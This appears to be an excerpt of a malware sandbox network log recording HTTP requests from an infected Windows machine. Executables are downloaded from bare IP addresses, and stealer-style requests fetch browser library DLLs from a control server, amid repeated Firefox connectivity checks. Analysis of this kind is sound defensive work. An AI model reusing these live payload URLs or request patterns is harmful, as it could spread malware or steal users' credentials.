en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=27D5836E84FB6FA100DF963A85896E2B; _EDGE_S=F=1&SID=189B3437E698653C251B2163E7526413; _EDGE_V=1; SM=T
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /files/BlueMail.exe HTTP/1.1Host: 45.11.183.55
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/encoxx/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/hell911/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/winrar/eula.txt HTTP/1.1Host: 45.155.249.199
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: dHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: sHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11If-Modified-Since: Wed, 11 Dec 2024 08:22:24 GMTIf-None-Match: "67594bc0-b1a00"
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/encoxx/random.exe HTTP/1.1Host: 31.41.244.11If-Modified-Since: Thu, 12 Dec 2024 07:55:00 GMTIf-None-Match: "675a96d4-60200"
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
